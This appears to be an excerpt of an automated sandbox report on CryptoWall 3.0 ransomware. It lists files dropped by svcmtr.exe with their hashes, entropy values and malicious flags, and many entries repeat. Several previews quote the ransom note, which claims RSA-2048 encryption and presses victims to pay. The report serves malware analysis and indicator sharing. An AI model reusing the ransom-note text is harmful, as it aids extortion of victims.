                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:true
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1614
                                                                                                                          Entropy (8bit):7.7076338004086065
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDgQkL2d+AjKqNcOob5ihE102JJUUCNg:cztoD0ARhfskg
                                                                                                                          MD5:4C80FCA02EE9674BD9CBBBD7C261E5BB
                                                                                                                          SHA1:BEE5CC500BD1C41D2867CD2A8E05D02222CFD694
                                                                                                                          SHA-256:6AAB0DE0F72A66A64FEE3CC801820A94AC3F1CBE3847DA985A663D941DF8AF41
                                                                                                                          SHA-512:23C346AA9CF2A07024D8D27008AD0B170E58D8FAC5166FD6E0DAE538B4428086685320F11B5BEEF5E120C471A86DB88F49F8181F68347C3A6822D5F2DDE2C020
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1614
                                                                                                                          Entropy (8bit):7.690739959690895
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2WxX5/T/DJs9kNo31rC97ObfchOofbcAuMQQGfx2dyfUA9J:c+9U40oDg9X1T/DJsyc+OwEWJRtwsdi7
                                                                                                                          MD5:438AC1B0C5AE02C847E187894FB92FA2
                                                                                                                          SHA1:8398861B7E137FBD65C8002E25AE8D4FBCC4AA32
                                                                                                                          SHA-256:7317593F09823A8F8A183E38DBA7A90FA3D01340C4FE52D50FF47100FAB36982
                                                                                                                          SHA-512:DB3C6BA861C4BA76D33DC932AB000BCD7F33509EE9A7104558EDBE9953B3C707010AA00696B70195705B0292426B6C840E0788653191EDE03C7645D1C6B9FBEF
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1902
                                                                                                                          Entropy (8bit):7.762082222377723
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDg5Y96OL6bxq3aLQGVnkhkqKKDBl1ZSXbAN:cztoD39L6MaQynkhkIBl1ELO
                                                                                                                          MD5:FA5027966A03F348427D6993DB4B60B5
                                                                                                                          SHA1:C8B109F7048DF8442108676E940D2A22DA726030
                                                                                                                          SHA-256:039770AC0678E7D893CFE523CBA009AEEFE5943A1D2ED44B0650445C8D0CC996
                                                                                                                          SHA-512:7D51C6F26F417956DBE5F0E448E07EF81D73DC641143C971FAB32FE981ACB1375F92FE0B977BD237C2A5245A163B9AFDA016246E92C0E31DA43DC7270AE5BDD1
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1870
                                                                                                                          Entropy (8bit):7.756211554675807
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDg5o0nkE15SXcoCvvmBKMuN+qkf1CdeQK/qppKr7iy:cztoDcGErSXuvS8N+Ff1C0SKOy
                                                                                                                          MD5:C928067616207C9C9A489BB971559C28
                                                                                                                          SHA1:6212693065F64D854E7177BBED93B13FE7E5FE39
                                                                                                                          SHA-256:6C99EB3FD60C8335E6E96C3BAFF731300597DD6497855D687201CE23E7391126
                                                                                                                          SHA-512:14A00C1558773DA6CA323A86CFBB895653299DFE04AB10E68C97B9555BDF7E3CBAC05EBCD74CE0336ACE5B3D008665C7B253F0472EB0A36D328D13D055DE2DB0
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2446
                                                                                                                          Entropy (8bit):7.8246035609718
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDgZfFnM8IpTeH9OkZEGf3tcnK8fJDBSIsU6sjx8NApe:cztoDq1M8GY1ZRZYDBSIs1sOK8
                                                                                                                          MD5:EAB0670927FCD5F822B21D8E09AB039B
                                                                                                                          SHA1:4B96AFCF87DC50901A57853B5822B9187CE8F600
                                                                                                                          SHA-256:4210D1C4F62662725D25D9FEA37140AEFA2EE6849B4D2A5C4E04192FE45AE19B
                                                                                                                          SHA-512:9772618503549A98D51002A6E3C3B91F7C0969B929A51606EB05A2C11402096B06D10123315EC4F09698F57F1D22894F089F0FE607D5D2F61F929B240D360AF4
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2382
                                                                                                                          Entropy (8bit):7.824190227074992
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDgjKxnu9Wwk6dfGoOxDCDRpqp1gUZzpZb3UIY1m63W8:cztoDhFwlFOG+pNzv3a1HG8
                                                                                                                          MD5:004373613EFF96FBC1713A9A3DDA33A3
                                                                                                                          SHA1:138E6AA14A75B339D826EE366E13576EDF556810
                                                                                                                          SHA-256:629A1AA60ACF65814085C430132EB59F508E2412BFB523FEA2DAC15E57C14262
                                                                                                                          SHA-512:355698BC33EEFBAC55B0D76DF534F70940EC7BC167BA40B57B387C1DA8DBA5F1F56B2F199BC85EEEBF8A515431494F49F7917278237CEEE01F0DE3335A27B415
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1822
                                                                                                                          Entropy (8bit):7.754150731458982
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDg73g1u6CYvwaRLbIOZOhxWd1y7iuEiUI:cztoDM3g12gFbImSgd17bI
                                                                                                                          MD5:EFAE0683B6F5A11BDDB2B11A6C05146B
                                                                                                                          SHA1:7A5E74032B09548C8E75D80C672F3CBF1FB7F5E5
                                                                                                                          SHA-256:D7AC49D1902A7C3480DD144B65250FAFCFE4EEAAEA6BF88CE0D6F919C3B617B2
                                                                                                                          SHA-512:30D87D2A0A2C08E4F9677963BCB538602AE3891902893A94B08873C470C2A29E0E2D5E5C3C9371D05281F10C218E744EAA50A8BB6B4B83DFF94EE53FDD97D882
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1182
                                                                                                                          Entropy (8bit):7.547721194304397
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2JMwwRCi47yXNKu+NGBaq4JJ5pTwVN/c+:c+9U40oDgwMRR31XNxIGBloJX8k+
                                                                                                                          MD5:23EDF58672017B7B9688D4D23289351A
                                                                                                                          SHA1:0C0DED5FE88526EAA7D8F2DE0DA50DAED02075EC
                                                                                                                          SHA-256:D659AA9BF54612D79168F4F0C28D10BD81869017608773292A632A681A82ABB4
                                                                                                                          SHA-512:4165FBE66C3D02467B6A139E5D700801977924BA58D549E3F8642B0EED22FC5BF6D4C3C44181F168C374613E18C4A01B78C0C67EF7446DB2A65008E66DEDF925
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1566
                                                                                                                          Entropy (8bit):7.6972077428042915
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDgrp46tjKirvCUSX6y+fkGbSXRPRtzyE:cztoDwu6llCV6CbVRZz
                                                                                                                          MD5:605B29A01C5145D64487F502D7925CCF
                                                                                                                          SHA1:07E09624840A1207DA532E9C4A949B08DCC39955
                                                                                                                          SHA-256:CB3F906B0234F1FBA4FC84F2A8DAC6D418452D440C27C22692E228A46B4AC344
                                                                                                                          SHA-512:6F5711AD7DD7F93E3EE6CE39229EB2863B5ACE75542C607819DD35C78F997D4F12AE846202FFE1F436079B01F862416174F7351CCC99734EEEDA7718554FD018
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1694
                                                                                                                          Entropy (8bit):7.703343097095299
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2cpO7qHyH4fYD7AuuTFEQOzYRgAhsFRvGaJO2n38E:c+9U40oDgfpsFuYD76mBmRgr3p
                                                                                                                          MD5:4A4514FB43670EE7C66ED40411DEC5A0
                                                                                                                          SHA1:12D1FE3EFEE19BF6765C0302124DDBABA1D22E47
                                                                                                                          SHA-256:2535E4F9A1DBEC5E209A3018F5496FC175D5E0DC0E69FE2E38979B4F9448C738
                                                                                                                          SHA-512:F69BC749CD8E72829E54B4D353B2AFD5D36BBCFA79A7ADD3E171C0C0B4EA2F7BACA0D2B3BE707BE782C43485F3CD5B06DBA997038A2EBE27AB335948298AD772
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1278
                                                                                                                          Entropy (8bit):7.569370571349907
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S27VEBOIR2vGfpS/kWfgf012faOQrz3Uzf:c+9U40oDgpoxGxAk4gsPOqzEr
                                                                                                                          MD5:6EBFE340CAEFE01CAB6CEDE6A9286839
                                                                                                                          SHA1:D773F857E48D922F083BB7C8ABFEF7175138BE6D
                                                                                                                          SHA-256:4CEC4A1B91E72098C50CE37989C97D9EEC3C7E83E3BF797168421AE053465361
                                                                                                                          SHA-512:49DBE6E0846CCB7779E7E9827D12691E014885A44BE7A94AC0622704A1CED9A4F0BE49719E5614D1BD1B828DBF96FF3FF6E87E7FB2C74F77AD6B23E561A60C21
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1054
                                                                                                                          Entropy (8bit):7.445607031987796
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2GkrRulvSnb8QPB0VAz1Hqb4:c+9U40oDguRulvmJd
                                                                                                                          MD5:999FA04F770523B19591F15B3F23D52D
                                                                                                                          SHA1:E8E430EDB732E797EC1916E3A8FDDA940E6D6221
                                                                                                                          SHA-256:7DEF86268FF42AE79AB2D667CAE13A53B5B7D1909C6FAC20DC8D88D2C6820E48
                                                                                                                          SHA-512:2F439D3DE923311B16874FD6CC208A4445015921366E65685163C282F50AD15015F6E450FE1DF6F18AC23F1FB5BE2CBBBC06CE9BC0EC6102FA562826BAF6017C
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1150
                                                                                                                          Entropy (8bit):7.525590156814136
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2f9nbcSYbBY18l+COyU5X03otj3GZWfkTgRC:c+9U40oDg49nr5phyBSyZWsTn
                                                                                                                          MD5:BDC97794EDD5B1772D2CEB2DC7DF5750
                                                                                                                          SHA1:FFF9F350F91AE298529F8EA7CA933EB4C7AED149
                                                                                                                          SHA-256:337F0418848F46258C01186A9E86A5D721AC820D9B6B6CD53ECCF549397033D3
                                                                                                                          SHA-512:33510588F61AB3FB2B89CC0AE585772754DA314647796CEB1309A0BBAB27201BCD70F90B8455F9FA9F503009421D096D482183DA9A74F2267F16C07A1D7111C6
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2590
                                                                                                                          Entropy (8bit):7.870620535052442
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDg4RgcD48YonE7lQW48cBBtWcSwANYn2c/ytQ0GjTCHY/9I5:cztoDLgc3hns48cRSJSn2RiHj2HYFC
                                                                                                                          MD5:259ECBFB896CD4FF062A0EE89EBAAF88
                                                                                                                          SHA1:972C8C9B58E68CCF6AE232C94BDAE9855E254039
                                                                                                                          SHA-256:15A14326CB0F013D3E3B2F98A4E152019AA1972779B2870A771A43EFA8C9338A
                                                                                                                          SHA-512:4AB438C6603FB1F7CC090BBF1184F3FC1C37BCE2ACEE3D6F7BC43673ADD9F7CB2BAED50EF36D07CE4784A9C3110D99267DE67FC1C10D40341A3BBC11BC6F69B2
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2302
                                                                                                                          Entropy (8bit):7.826419728627804
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDgiEkUCtA2MM68u42oaNDjLzwLVeHddrq9zVNuvk7Pc:cztoDB9Bn2JNTzwQHjmjuso
